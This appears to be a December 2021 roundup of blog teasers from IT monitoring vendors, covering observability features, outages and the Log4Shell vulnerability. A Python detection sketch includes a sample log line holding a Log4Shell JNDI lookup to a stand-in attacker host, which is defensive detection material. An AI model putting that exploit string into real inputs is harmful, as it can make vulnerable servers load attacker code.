
December 2021

2021: The new working model is hybrid

As the world is trying to regain its usual pace, we at Site24x7 have been engrossed in churning out new features to help organizations enhance the health of their IT resources and meet their evolving monitoring needs. We've drafted a summary of notable features to look back on our achievements this year. We extended our monitoring capabilities for Kubernetes, network traffic, ISP latency, VMware ESXi hardware, and Mobile APM for React Native apps.

ECS Monitoring Metrics that Help Optimize and Troubleshoot Tasks

Compute functions that run on Amazon’s Elastic Container Service (ECS) require regular monitoring to ensure proper running and managing of containerized functions on AWS – in short, ECS monitoring is a must. ECS can manage containers with either EC2 or Fargate compute functions. While EC2 and Fargate are compute services, EC2 allows users to configure virtually every functional aspect. Fargate is more limited in its available settings but is simpler to set up.

Grafana Tempo 2021: Year in review

Grafana Tempo has had quite a year. Just eight months after it was announced at ObservabilityCON 2020, the open source tracing solution went GA. Since the Tempo team released v1.0 in June, we have ingested more than 39 trillion spans, a 26x increase from last year. We also introduced Grafana Enterprise Traces, which is powered by Tempo, to the Grafana Enterprise Stack.

Datadog vs. Splunk vs. Scout | How Do They Compare?

Every day the world is changing in terms of technology. A new innovation happens every second, and software and websites are becoming more and more advanced. We can now access almost every service on the internet, and software needs to be maintained as a top priority so that customer service will not get hindered. Software monitoring, however, is not an easy task. It is a 24x7 business because any user can face an issue at any time.

Log4J Does What?!!!

You have probably heard of Log4Shell, the security vulnerability that has ‘earned’ itself a NIST severity score of 10. In this post I will show a really basic example of how this vulnerability actually works. I will walk you through some basic usage of the Log4J library and then show how some fairly basic inputs into this library can cause truly unexpected, and potentially disastrous, outcomes.

Part I: A Journey Into the World of Advanced Security Monitoring

Dealing with hundreds of security alerts on a daily basis is a challenge, especially when many are false positives and all of them take up too much of our valuable time to sift through. Let me tell you how our security team fixed this, as we built security around the JFrog products. First, let me tell you a little bit about our team.

8 Best Practices to Simplify Your Data Center Consolidation

Whether you are downsizing your infrastructure within a single room or eliminating half of your data center sites, a data center consolidation is a complex, risk-prone project. Fortunately, you can mitigate many of the mistakes and unwelcome surprises that even the most experienced data center professionals find derailing their consolidation.

Remote Data Center Management: Metering, Monitoring, & Management in the New Normal

The COVID-19 pandemic ushered in a "new normal," and data center professionals must adapt to keep up with the issues of today while maintaining uptime and business continuity. New challenges include an increased demand on infrastructure with a higher potential for outages, more time pressure on projects, and less staff onsite resulting in a more difficult environment for collaboration, planning new infrastructure and services, and performing changes and maintenance. Data center managers must develop a comprehensive remote data center management strategy to find success.

What are AWS EC2 Instances? A Tutorial for EC2 Metrics Shipping with Logz.io

Amazon Elastic Compute Cloud (a.k.a. EC2) is no doubt the core of current computing infrastructure. It sits at the heart of AWS, the main kind of structure for housing virtual machines and containers for development and operations. Applying standards of observability with EC2 logs and EC2 metrics (or any kind of AWS metrics, for that matter) will tell you whether you have the right sorts of instances in place (and the appropriate size of those instances).

New in StatusGator: See component statuses

A small but useful new feature is now available in StatusGator: You can see the status of all the components of a given service from your filter configuration page. As a reminder, component filters are a feature of all StatusGator paid plans. They allow you to filter your notifications and dashboard service statuses to specific components of a given service. Services such as large cloud providers often have dozens or even hundreds of individual regions or products.

Outage Alert: Top 10 Downtime Incidents of 2021

2021 has been an eye-opening year for both businesses and consumers who use popular websites and applications. We have all seen notable increases in the frequency and severity of outages as dependency on internet infrastructure grows – with no signs of slowing down. With our reliance on automation and connectivity expected to increase in 2022 – let’s review some of the top internet outages and website downtime incidents of 2021.

Grafana Loki 2021: Year in review

This year, we were excited to deliver the easiest version of Grafana Loki to use yet. With Loki 2.4, the Loki team introduced a simple, scalable deployment, and over the past 12 months, we added lots of great new features. Not to mention, we launched Grafana Enterprise Logs, a new addition to the Grafana Enterprise Stack that’s powered by Loki. But none of this would have been possible without our active community: In 2021, Loki had 166 contributors and 823 PRs in GitHub.

Ruby Application Manual Instrumentation for Distributed Traces

OpenTelemetry is a project by the Cloud Native Computing Foundation aimed to standardize the way that application telemetry data is recorded and utilized by platforms downstream. This application trace data can be valuable for application owners to understand the relationship between the components and services in their code, the request volume and latency introduced in each step, and ultimately where the bottlenecks are that are resulting in poor user experience.

How to Detect Log4Shell Events Using Coralogix

The Log4J library is one of the most widely used logging libraries for Java code. On the 24th of November 2021, Alibaba’s Cloud Security Team found a vulnerability in the Log4J framework, known as Log4Shell, that provides attackers with a simple way to run arbitrary code on any machine that uses a vulnerable version of Log4J. This vulnerability was publicly disclosed on the 9th of December 2021.
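As a rough illustration of what detecting such events can look like, here is a minimal Python sketch that flags log lines containing the `${jndi:` lookup prefix used in Log4Shell exploit strings. It is not Coralogix's detection rule; the function name, the sample log lines, and the `attacker.example` host are all hypothetical, and obfuscated variants of the string are deliberately out of scope.

```python
import re

# Matches the plain "${jndi:" lookup prefix, case-insensitively.
# Assumption: obfuscated variants (for example nested lookups that
# spell out "jndi" piece by piece) are not handled by this sketch.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)


def find_suspicious_lines(lines):
    """Return (line_number, line) pairs that contain a JNDI lookup string."""
    return [
        (number, line)
        for number, line in enumerate(lines, start=1)
        if JNDI_PATTERN.search(line)
    ]


# Hypothetical access-log lines, made up for illustration.
sample_log = [
    "GET /index.html 200 Mozilla/5.0",
    "GET /login 200 ${jndi:ldap://attacker.example/a}",
    "GET /health 200 curl/7.79.1",
]

for number, line in find_suspicious_lines(sample_log):
    print(f"line {number}: {line}")
```

A plain substring match like this is only a first pass; a production rule would likely need to account for encoded or nested lookups as well.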

Grafana 2021: Year in review

Numbers don’t lie — and the data shows that in a year in which we, once again, endured unpredictable changes, Grafana experienced unparalleled success. In June, we introduced Grafana 8.0, which included unified alerting, new visualizations, real-time streaming, and more. Since then we have introduced a host of new features as well as new data source plugins that only reinforce Grafana’s commitment to our “big tent” philosophy.

6 Alternatives to Sentry Error Monitoring

You are likely to face challenges in selecting the best alternatives to Sentry for error monitoring. It can be daunting to read through multiple software companies and vendors to note their features, benefits, and shortcomings. Let’s discuss simplifying this process by covering the six best alternatives to Sentry error monitoring. Feel free to navigate this guide using the links below.

Hybrid Cloud Predictions: 2022 Will Be the Year of Cloud Arbitrage

The as-a-service model and shared economy have changed the way people think about products, properties, and partnerships. Netflix found massive success not by improving the DVD experience but by eliminating it altogether. Companies like WeWork, Airbnb, and Vrbo created a shared economy that reduces the need for ownership. As a part of our business transformation in the last year, Virtana has embraced both the sharing economy and as-a-service subscription.

How Product Teams and CTOs Can Create Customer Delight

Customer satisfaction is about meeting customer expectations; customer delight is about exceeding them. Building customer delight into your product means going above and beyond simple customer satisfaction in ways that build a long-term emotional connection and loyalty towards your company. And customer delight matters.

How to Monitor Microsoft Teams

There is no doubt that the events of 2020 triggered a huge surge in the use of unified communication products. In the consumer space, everyone and their grandmother became familiar with Zoom; in the enterprise space though, many took advantage of their Microsoft licensing to leverage Teams meetings and calls as a primary communication mechanism. This, in turn, has focused a lot more attention for system administrators on how to monitor Microsoft 365 (O365) and Teams in particular.

Predictions 2022: OpsRamp Technology Leaders Sound Off on What to Expect in the New Year

2021 brought us widespread COVID vaccines, the Great Resignation, global supply chain disruption, inflation that went from transitory to persistent, accelerated digital transformation in the wake of the pandemic, an attempt at a return to normalcy—and the office—and plenty of uncertainty for the year ahead, thanks to the Delta and Omicron variants.

Monitoring Office365 and Azure Health Status with Coralogix

Life is all about perspective, and the way we look at things often defines us as individuals, professionals, business entities, and products. How you understand the world is influenced by many details, or in the case of your application – many data sources. At Coralogix, we not only preach comprehensive data analysis but strive to enable it by continuously adding new ways to collect data.

Historical status data now available

StatusGator customers on our Venture plan have long had access to historical cloud status data. In the past, a simple support request was all it took to get a CSV or JSON feed of any cloud service status data. Now, we’ve brought that data into the StatusGator app itself. A new menu item is now available: Reports & Data. From there, you can choose a date range and download the complete history of all the services in your dashboard. We’d love to know what you think of this feature.

How product teams can manage their performance using Grafana, Prometheus, and Oracle metrics

Ever known a project manager who thinks a task takes minutes when it really takes hours? One company has developed a helpful monitoring tool that not only helps project managers make more realistic estimates, but also helps product teams save time, increase efficiency, and improve their overall performance. At ObservabilityCON 2020, Walter Ritzel Paixão Côrtes, a product designer at Dell, gave a presentation about a data-driven solution his team developed called Product Team Observability.

Automatic creation of monitored objects in Avantra

One of the main development themes for the Avantra 21.11 release was making life easier. This includes using and rolling out Avantra. Our goal is to reduce the effort required on your part and let you focus on the things that are important to you and your business. As a result, Avantra 21.11 comes with a number of improvements to the onboarding process for new systems, and maintaining and updating existing ones. So, let me take you through these new improvements.

Wellness and surfing... with Kentik!

It’s an exciting time here at Kentik. We’re expanding into new markets, working closely with amazing customers, and continuing to hire talented people to grow our team. We announced a new round of funding in the fall. We’re continuously building on our product. And we have our sights set on scaling our systems to large numbers. As Kentik’s backend engineering manager, I know this has kept our team very busy.

Incident Review - The Third AWS Outage in December: When it Rains, it Pours

The following is an analysis of the Amazon Web Services (AWS) incident on 12/22/2021. When it comes to major AWS outages, three times is certainly not the charm. For the third time in three weeks, the public cloud giant reported an outage, this time due to a power outage “within a single data center within a single Availability Zone (USE1-AZ4) in the U.S.-EAST-1 Region,” according to the AWS status page. Here at Catchpoint, we first observed issues at 07:11 a.m.

Goodbye 2021 & Hello 2022!

Netreo enjoyed a tremendous year, and we are all exceedingly grateful for our outstanding customers. May you, your colleagues, family and friends enjoy a healthy and happy holiday season filled with laughter, warmth and joy. We know our success is based on your success, so without further ado, let’s take a look at how our 2021 highlights will fuel a great 2022 for all our customers!

Ask Miss O11y, Holiday Edition

Ooh, good question! My favorite thing about this part of the year is that work slows down, everybody is on vacation, and those of us not traveling get to work on little projects that we’re too busy to touch most of the year. As Martin Thwaites put it: “The Product Owners are away, the devs will play.” For Martin, this year, “play” means adding tracing to more of their services.

Smarter Digital Payment Monitoring to Protect Business Operations

You place your mug on your desk and boot your computer. Like every morning, you skim over various dashboards on one screen and sift through your email alerts on the other before you start pulling the regular reports. But this morning turns out to be nothing like other mornings. It is about to take a mean twist that will keep you from ever finishing your morning coffee.

What InsurTech industry trends to watch for in 2022

In case you missed it, insurtech — technology developed to improve and transform the insurance industry — is having a bit of a moment. Forrester recently reported record-breaking funding for insurtechs, closing Q3 at $15 billion – more funding than in 2019 and 2020 combined – with more deals anticipated by the end-of-year.

Grafana EMEA meetup recap: shift left observability, AI and load testing, monitoring plants, and more

On Dec. 8, we gathered the Grafana EMEA community for another dynamic meetup. Experts from the Grafana Labs and k6 teams alongside observability pros from different organizations covered topics ranging from shift left observability practices to monitoring your green thumb at home with Grafana. In case you missed the virtual get together, here’s a recap of each talk along with the session videos.

Auto-Instrumenting Node.js Apps with OpenTelemetry

In this tutorial, we will go through a working example of a Node.js application auto-instrumented with OpenTelemetry. In our example we’ll use Express, the popular Node.js web application framework. Our example application is based on two locally hosted services sending data to each other. We will instrument this application with OpenTelemetry’s Node.js client library to generate trace data and send it to an OpenTelemetry Collector.

Network Monitoring and Troubleshooting for Remote Workers with SPI Health and Safety

With many businesses having switched to part-time or even full-time remote work, the challenge for IT teams becomes how to provide quick and efficient support for network problems remotely. In this article, we’re running you through how SPI Health and Safety is using Obkio to monitor network performance and troubleshoot performance issues for all their remote call center employees.

Can your SAP operations keep up with business demands?

SAP operations teams are increasingly required to support new initiatives within their businesses, while keeping the lights on throughout the existing landscape. In a world where time is a scarce resource, this can be a challenging balancing act. Too often teams are far closer to losing their balance than they would like (or than the business would like to hear).

AIOps for Network Monitoring

Multi-cloud and hybrid cloud environments, microservices architectures, the rapid growth in the number of mission-critical applications, and the sudden surge in remote work have made enterprise networks exponentially complex. These networks are often not designed to handle the variety of physical and wireless media that’s become common today, for instance, the number of video calls, data transfer through screen sharing, etc.

Future Outlook: AIOps Will Be A Must-Have For Enterprises In 2022

If 2020 was a year of turbulence, 2021 was the year of complete digital transformation. Enterprises across the globe focused their efforts on enabling stellar digital experiences — both to customers and internal stakeholders alike. This had a significant impact on the IT landscape. The number of applications that were ‘mission-critical’ increased overnight. In a recent survey, respondents said that they have an average of 71.4 mission-critical applications.

How to Measure Uptime SLOs Using Pingdom and Nobl9

Do you find yourself asking, “What should our first service-level objective (SLO) be?” The simplest way to get started if you have a website is to measure uptime SLOs. The SLO will measure your uptime and how your site compares to your reliability goals. By following the steps outlined here, you can get up and running with your first SLO in minutes. To get started, you’ll need to set up an account on SolarWinds® Pingdom®.
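To make the idea of an uptime SLO concrete, the following Python sketch computes an uptime percentage from check counts and compares it with a target. It does not use the Pingdom or Nobl9 APIs; the function names, the 99.9% target, and the check counts are assumptions chosen purely for illustration.

```python
def uptime_percentage(total_checks, failed_checks):
    """Share of successful checks, as a percentage."""
    if total_checks <= 0:
        raise ValueError("total_checks must be positive")
    return 100.0 * (total_checks - failed_checks) / total_checks


def error_budget_remaining(total_checks, failed_checks, slo_target):
    """Failed checks still allowed before the SLO target is missed.

    A negative result means the error budget is already spent.
    """
    allowed_failures = total_checks * (100.0 - slo_target) / 100.0
    return allowed_failures - failed_checks


# Hypothetical numbers: one check per minute over 30 days, 20 failures,
# measured against an assumed 99.9% uptime target.
TOTAL_CHECKS = 30 * 24 * 60
FAILED_CHECKS = 20
SLO_TARGET = 99.9

uptime = uptime_percentage(TOTAL_CHECKS, FAILED_CHECKS)
budget = error_budget_remaining(TOTAL_CHECKS, FAILED_CHECKS, SLO_TARGET)
print(f"uptime: {uptime:.3f}% (target {SLO_TARGET}%)")
print(f"failed checks left in budget: {budget:.1f}")
```

Expressing the target as an error budget (how many more failed checks are tolerable) tends to be easier to act on than the raw percentage.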

Video Observability: Videoconferencing Runs the World-Here's How to Make Sure Yours Keeps Running

When it comes to work, we all know to put our best foot forward. However, as we increasingly rely on videoconferencing in our everyday work life, success also depends on being able to put our best face forward. Unfortunately, that can add up to a headache for IT when it comes to delivering flawless video experiences to a widely distributed workforce.

Quarterly Product Update: Better Traces, CONCURRENCY, and RATE

At Honeycomb Developer Week, I got an opportunity to walk through a couple of fun new features we’ve shipped since August and ways that we’ve been able to improve Honeycomb for you. Hearing feedback from our users and customers (through support requests, in the Pollinators community, from Twitter, etc.) helps us make Honeycomb better for you.

Top Data Visualisation Tools (2023 Edition)

If you have been trying to compare all of the best data visualisation tools you may have found it difficult to find a detailed list that includes both open-source and proprietary solutions to help you compare and make an informed decision on what you need going forward. In this guide, you will find out everything you need to know about the leading solutions for data visualisation to help you get started with your next analysis project.

Use Datadog's GitHub and source code integrations to streamline troubleshooting

GitHub Apps is a service that helps you automate key processes in your workflow. Datadog now uses GitHub Apps to interact directly with the GitHub API, enabling you to add valuable context to your notebooks. And once you’ve also integrated Datadog with your source code, you can access links to Git repositories and inline code snippets for stack traces.

Monitor Kubernetes with Fairwinds Insights' offering in the Datadog Marketplace

Fairwinds Insights is Kubernetes governance and security software that enables DevOps teams to monitor and prevent configuration problems in their infrastructure and applications. Not only does Fairwinds simplify Kubernetes complexity, but it also reduces risk by surfacing security and reliability issues in your Kubernetes clusters.

Connection Center in 3 mins

Cookdown's Connection Center is designed to make SCOM your single source of truth. Find out all about how it works, our code-free integrations, and much more. Unlock SCOM's full potential by connecting it to all your IT enterprise tools and you'll never miss a critical SCOM alert again! The setup is super simple! To get started just download a FREE 30-DAY TRIAL and you'll be syncing alerts in minutes.

Connection Center Deep Dive

A deep dive into Cookdown's Connection Center, which is designed to make SCOM your single source of truth. Find out all about how it works, our code-free integrations, and much more. Unlock SCOM's full potential by connecting it to all your IT enterprise tools and you'll never miss a critical SCOM alert again! The setup is super simple! To get started just download a FREE 30-DAY TRIAL and you'll be syncing alerts in minutes.

Connection Center for Webhooks Inbound Demo in 3 mins

This short demo illustrates how Cookdown Connection Center can integrate SCOM with anything, anywhere! We simply use Webhooks to convert critical SCOM alerts into actionable notifications in real-time. So, now you can push alerts from SCOM to any application supporting Webhooks, which means your team can view alerts in their favorite tools. Find out how Connection Center can get your stakeholders more engaged and better connected!

Connection Center for Webhooks Inbound Deep Dive Demo

This deep dive illustrates exactly how Cookdown Connection Center can integrate SCOM with anything, anywhere! We simply use Webhooks to convert critical SCOM alerts into actionable notifications in real-time. So, now you can push alerts from SCOM to any application supporting Webhooks, which means your team can view alerts in their favorite tools. Find out how Connection Center can get your stakeholders more engaged and better connected!

Diagnosing Downtime, Made Easy with Uptime.com

Downtime is one diagnosis where you don’t want to waste time on second opinions. You want accurate alerting the first time around, followed by drill-down tools to uncover and help you treat the root cause as fast as possible. As with any form of health (even domain health), preventive care should always be your first defence. With Uptime.com, “preventive care” means 360º monitoring that doesn’t skimp on analysis.

Flask Application Manual Instrumentation for Distributed Traces

In this blog series, we share the application instrumentation steps for distributed tracing with OpenTelemetry standards across multiple languages. Earlier, we covered Java Application Manual Instrumentation for Distributed Traces, Golang Application Instrumentation for Distributed Traces, Node JS Application for Distributed Traces, and DotNet Application Instrumentation for Distributed Traces. In this blog post, we are going to cover.

New Relic vs. Appdynamics vs. Scout APM

New Relic and Appdynamics were the two most dominant APMs in the software industry some years back. But as technology advanced, other software monitoring tools started capturing the market. Where functionality was lacking, customers have begun switching to different tools because now they have a perfect solution for their particular use case.

DX NetOps Support for Symantec Secure Web Gateways (SWG)

DX NetOps network monitoring software now supports Symantec Secure Web Gateways (SWG). This short demo shows how the solution can provide visibility for SWGs in the context of your broader network and network delivery strategy. DX NetOps unifies alarms, performance and flow and can help solve key operational challenges for SWGs including event correlation and streamlined ticketing workflows.

New in Grafana Loki 2.4: The Simple Scalable Deployment Mode

This mode is a bridge between running Loki as a single binary/monolithic mode and full-blown microservices. The idea is to give users more flexibility in scaling and provide the advantages of separating the read and write path in Loki. Command to run the flog log generator: Start correlating your data with Grafana Cloud and the new FREE tier.

How Grafana powers the dynamic visualizations of IoT data for AWS IoT TwinMaker

At re:Invent this year, AWS announced its new digital twin service, AWS IoT TwinMaker (in preview), which allows users to create digital twins of real-world systems like buildings, factories, industrial equipment, and production lines. Using a digital twin to monitor and improve operations for a physical system requires ingesting data from IoT sensors, process instruments, cameras, and enterprise systems, and curating and associating data from these disparate sources.

How Product Teams Can Decrease Shopping Cart Abandonment Rate by Improving UX

Checkout optimization can increase conversions by 36% (according to Sleeknote). And if your company struggles with a high cart abandonment rate, you’ll have to work on enhancing your user experience by removing blockers that lead to your customers abandoning their shopping carts. And for that, you will need to leverage qualitative and quantitative user research.

To Mask, or Not to Mask? That Is the Question

While I write this blog post, I reflect on the years of being a system administrator and the task of ensuring that no sensitive data made its way past me. What a daunting task, right? The idea that sensitive data can make its way through our systems and other tools and reports is terrifying! Not to mention the potential financial/contractual problems this can cause.

Monitoring AWS EC2 Cloud Instances with AWS CloudWatch

Amazon Elastic Compute Cloud (Amazon EC2) is a web service that provides secure, resizable compute capacity in the cloud. It is designed to make web-scale cloud computing easier for developers. Amazon EC2’s simple web service interface allows you to obtain and configure capacity with minimal friction. It provides you with complete control of your computing resources and lets you run on Amazon’s proven computing environment.

Auvik's Network Vendor Diversity 2021: Who Reigns the Network?

At the end of November 2021, Auvik released our annual Network Vendor Diversity Report, and the data we collected had some interesting findings. Over 520,000 devices across 40,000 networks contributed, showing which vendors are taking a leading share of the market. In this roundup, we’ll show you some of the most interesting learnings we saw in 2021.

Database monitoring with Sumo Logic and OpenTelemetry-powered distributed tracing

We are living in a data world. Data describes and controls almost every aspect of our life, from presidential elections to everyday grocery shopping. Data grows exponentially and so does the complexity of applications that manage that data. We all know the recent shift to microservices and other revolutionary changes that happened in the way we design, develop, deploy and operate modern applications.

A Comprehensive Guide to Firewall Monitoring

Securing your company's network against online threats can seem like a daunting task. There are so many different e-commerce security threats, and it can be hard to know where to start or if you're adequately protected against all of them. One important weapon in the fight for network security is your firewall. Although your firewall will remain hidden from view for most of your employees most of the time, you shouldn't forget about it.

Get the most out of kiosk devices while securing them using MDM

There’s a good chance we all interact with kiosks just as much as we do with humans, and this was true even before the pandemic. Self-service counters, airline check-in systems, library search devices, huge digital billboards for advertising, compact mobile devices for remote workers, ATMs at every corner, you name it.

Sponsored Post

Discovering vulnerable Log4J libraries on your network with EventSentry

Just when the Microsoft Exchange exploit CVE-2021-26855 thought it would win the “Exploit of the year” award, it got unseated by the – still evolving – Log4J exploit just weeks before the end of the year! Had somebody asked Sysadmins in November what Log4J was, I suspect that the majority would have had no idea. It seems that the biggest challenge the Log4J exploit poses for Sysadmins is simply the fact that nobody knows all the places where Log4J is being used.

Exporting and Sharing Graphs From AppSignal

You can now share any graph from AppSignal with your team, company, and the world. Click the export icon in the graph header to create a hosted image that you can link, embed, or download for further annotation. Developers often share performance screenshots with each other. Some screenshots end up on Twitter where developers explain how they improved their application’s performance with AppSignal. We regularly take screenshots of our graphs as well.

Log4Shell: How We Protect Sematext Users

On December 9, 2021, a vulnerability was reported that could allow a system running Apache Log4j 2 version 2.14.1 or below to be compromised and allow an attacker to execute arbitrary code on the vulnerable server. This vulnerability was registered on the National Vulnerability Database as CVE-2021-44228, with a severity score of 10. Here is a diagram of the attack chain from the Swiss Government Computer Emergency Response Team (GovCERT).
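The version boundary quoted above ("2.14.1 or below") can be turned into a simple check. The Python sketch below flags `log4j-core` jar file names whose version falls at or below that boundary. It is an illustration only, not Sematext's tooling: the helper names are hypothetical, it assumes the usual `log4j-core-<version>.jar` naming, and it will miss renamed, shaded, or nested jars as well as pre-release version strings.

```python
import re

# Assumption: jars follow the usual "log4j-core-<major>.<minor>[.<patch>].jar"
# naming. Renamed, shaded, or nested jars are not detected by this sketch.
JAR_NAME = re.compile(r"log4j-core-(\d+)\.(\d+)(?:\.(\d+))?\.jar$")

# Boundary taken from the text above: "2.14.1 or below".
LAST_AFFECTED = (2, 14, 1)


def parse_version(jar_name):
    """Return (major, minor, patch) parsed from a jar name, or None."""
    match = JAR_NAME.search(jar_name)
    if match is None:
        return None
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch or 0))


def is_flagged(jar_name):
    """True if the jar name indicates Log4j 2 at or below the boundary."""
    version = parse_version(jar_name)
    if version is None:
        return False
    return version[0] == 2 and version <= LAST_AFFECTED


# Hypothetical file names, made up for illustration.
for name in ["lib/log4j-core-2.14.1.jar", "lib/log4j-core-2.17.0.jar", "lib/log4j-1.2.17.jar"]:
    print(name, "->", "flagged" if is_flagged(name) else "not flagged")
```

File-name matching is a cheap first pass; confirming exposure would still require inspecting the jar contents and how the application uses the library.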

Monitor all your Redshift clusters in Grafana with the new Amazon Redshift data source plugin

In collaboration with the AWS team, we have recently released the new Redshift data source plugin for Grafana. Amazon Redshift is the fastest and most widely used cloud data warehouse. It uses SQL to analyze structured and semi-structured data across data warehouses, operational databases, and data lakes by using AWS-designed hardware and machine learning.

Empowering Data Management and DBAs Through Better Tooling | SolarWinds Roundtable

There isn’t a magical solution to the challenges that DBAs face on a daily basis. Instead, you need to become proficient in the use of a number of different tools to achieve your aims. In this roundtable, SolarWinds Head Geek Kevin Kline is joined by Megan Longoria and Jon Moore to discuss the evolution of tools for the accidental and seasoned DBA alike. The panel will discuss tools of the past, their favorite new tools, and overall, why you need database monitoring and operation tools.

What's new in Sysdig - December 2021

Here we are with the final “What’s new in Sysdig” monthly newsletter of the year. First of all, Merry Christmas, メリークリスマス, Buon Natale, 성탄을 축하드려요, С рождеством!, Vrolijk kerstfeest, Feliz Navidad! Whatever you may be celebrating, we wish you a wonderful holiday season from all of us at Sysdig!

Designing and Creating a State-of-the-Art AIOps Solution with Elastic

In this session we will go over our journey during the design and creation of the Tuuring state-of-the-art AIOps solution dedicated to digital performance. We'll highlight our major breakthroughs, lessons learned, how Elastic powers the solution and the value it brings for our customers. Speakers: Eric van Wijhe, Commercial Director, Tuuring; Pierre van Elswijk, CEO and Co-founder, Tuuring.

The values behind scaling cloud native security at Grafana Labs

On Nov. 8, I started as the new Chief Information and Security Officer at Grafana Labs. In my first five weeks, I’ve met about 100 really amazing people; learned and absorbed early lessons about our workplace culture; kicked off working groups for our 2022 initiatives (bug bounty FTW); and contributed to tackling our first-ever 0day. Amid all of that, I’ve also been doing a lot of thinking.

This Month in Datadog: December 2021 (Episode 7)

Datadog is constantly elevating the approach to cloud monitoring and security. This Month in Datadog updates you on our newest product features, announcements, resources, and events. To learn more about Datadog and start a free 14-day trial, visit Cloud Monitoring as a Service. This month we put the Spotlight on Datadog Sensitive Data Scanner which is now generally available.

Log4j critical vulnerability advice for customers

At Avantra, our customers trust us to keep their business operations based on SAP running smoothly. I have written in the past about the importance of SAP security, and how I believe that in the next few years, SAP risks becoming an attack vector for hackers. It should come as no surprise that security is an area in which Avantra has invested significantly since I became CEO.

Network AF, Episode 7: From Juilliard to bare metal with Zac Smith

In the latest episode of Network AF, your host Avi Freedman chats with Zac Smith. Zac is a 20-year networking veteran, the managing director of Equinix Metal, and a double bass player. Throughout Zac’s career, he’s focused on using software to build automated infrastructure platforms. That includes growing Voxel, the Linux-based hosting platform that sold to Internap in 2011, into one of the early, leading cloud-hosting companies.

ICYMI: Honeycomb Developer Week Wrap-Up

Getting started with observability can be time consuming. It takes time to configure your apps and practice to change the way you approach troubleshooting. So it can be hard to prioritize investing time, especially if you can’t clearly see how that investment will pay off. That’s why we put together Honeycomb Developer Week: short, snackable, time-efficient learning sessions to jumpstart your observability journey.

What is the Purpose of Observability? In a Word, Innovation

Asking an IT engineer or SRE to define the purpose of observability is kind of like asking someone to explain the purpose of life: There are lots of different opinions out there, and no way of proving any of them right or wrong. You could argue that observability is just a buzzword that refers to what used to be called monitoring.

The Top 25 Grafana Interview Questions

If you are looking for your next role which involves an in-depth knowledge of Grafana then you will want to make sure that you have revised sufficiently beforehand. In this resource guide on the top Grafana interview questions, we've listed all of the leading questions that candidates are commonly asked about this popular visual analysis tool alongside the answers you’ll need to pass. Want to improve your knowledge even further?

MQTT Topic and Payload Parsing with Telegraf

Buckle up, this one isn’t short…but I’m hoping it will be thoroughly informative! This post is about Telegraf as a consumer of MQTT messages in the context of writing them to InfluxDB. If you are interested in and unfamiliar with Telegraf, you can view docs here. Unsure if Telegraf aligns with your needs? I make a case for it in the Optimizing Writes section of this blog post. It may also help to have an understanding of Line Protocol, InfluxDB’s default accepted format.

Introducing the Sensu pipeline resource

Sensu’s observability pipeline includes resources for collecting, filtering, transforming, and processing observability data: checks, event filters, mutators, and handlers. These resources and Sensu’s observability pipeline concept are well seasoned and widely used at thousands of companies. However, configuration can be somewhat unintuitive, especially for new users.

AutoNation delivers peerless experiences to every customer

AutoNation delivers everything automotive, from sales and service to collision and parts. It also understands that buying a car is a huge decision, which is why it chose AppDynamics to help it provide a seamless experience for its customers. With full-stack observability across its applications, AutoNation can track, manage and optimize its service performance across the business. AppDynamics breaks down silos between teams so they can triage problems collectively, and quickly. The result is a better experience for thousands of customers across AutoNation’s 300 locations and 27,000 associates.

Managing for Customer Value for Enterprises

Earning customer loyalty is in the interest of both shareholders and management. Companies at the top of their industries in NPS or satisfaction rankings for 3+ years grow revenues roughly 2.5x as fast as their industry peers and deliver 2-5x the shareholder returns over the next 10 years. Here are 4 strategies that can help your company achieve consistent growth in customer value.

Bulk Update Multiple WebLogic WLSDM Settings via WL-OPC

When you need to change WLSDM settings across many WebLogic domains, use the “WLSDM Configuration” page to standardize those settings in bulk. WL-OPC spares you from juggling numerous tabs, avoids confusion, and saves you time with the WLSDM Configuration page!

5 Performance Measurement Metrics for Node.js Applications

Node.js applications are those that are created on the Node.js platform, which is an event-driven I/O server-side JavaScript environment based on Google Chrome's V8 engine. Since both the server-side and client-side are written in JavaScript, Node.js allows for easier and faster code implementation, as well as processing requests quickly and simultaneously. This is especially useful for developing real-time applications, such as chat and streaming.

Dashboard Fridays: Azure VM Health Dashboard

Adam is back for our final Dashboard Fridays video of 2021, and is joined by Azure expert and community hero Cameron Fuller of Catapult Systems! The Azure Management Services team at Catapult required a quick way to visualize the key health pieces for their customers, using a visually intuitive dashboard. In this bitesize video, Cameron will showcase this sample Azure VM Health dashboard focused on free disk space, heartbeat and CPU utilization. Tune in to learn how it was made, the challenges it solves, and how you can easily get your hands on it.

Broadcom Software Agile Operations Division Overview

General Manager Serge Lucio discusses Broadcom Software's Agile Operations Division, which offers business-critical software solutions that help the world’s leading companies transform their operating model to be more agile. Our ValueOps, DevOps, and AIOps solutions help these organizations drive innovation and achieve operational excellence to realize better business outcomes – and better experiences for their customers.

Monitoring remote user workstations with Prometheus, Ansible, and Grafana Cloud

Monitoring is usually associated with servers and applications, but the fintech automation platform Ocrolus recently needed to set up monitoring for a different purpose: to gain meaningful data and insights about nearly 1,000 remote user workstations.

Building Observability in Your CircleCI Deploy

With Liz Fong Jones, Principal Developer Advocate at Honeycomb, and Ryan Pedersen, Senior Solutions Engineer at CircleCI. In this talk, you’ll learn how Honeycomb keeps its CircleCI workflow duration at about 10 minutes per build through parallelizing build steps, using native container builders per architecture, and tracing execution of the build to know where to optimize.

LogicMonitor launches Santa Tracker Dashboard to monitor annual Christmas flight

A pillar of the December holiday season, the Elves at Santa’s Workshop work tirelessly year-round to provide a quality Christmas experience for children around the world who have made it to the Nice list. To ensure all children on the Nice list receive their Christmas packages in a timely manner, the IT team at Santa’s Workshop turned to LogicMonitor to monitor Santa’s annual journey around the globe in real-time.

Azure Thames Valley: Azure CosmosDB as a Knowledge Graph (in SquaredUp's Cloud product)

In this session, Richard Jones, SquaredUp CTO, shares how SquaredUp's new Cloud product utilises Azure CosmosDB as a graph database, to provide an explorable and searchable knowledge graph of all your applications, services, and resources spanning all your tools and platforms.

How a Superior Site Uptime Monitoring Solution Could Save Your Organization $1.85 Million

We all know the pleasure we feel when we dig into an old pair of jeans and pull out a crumpled $5 bill, or when we finally get around to vacuuming our car (“Hey, I don’t remember eating onion rings in here”) and find a few bucks in loose change. It’s as if the universe has taken a moment to smile on us.

Graph Observability: Honeycomb and Apollo GraphQL With OpenTelemetry

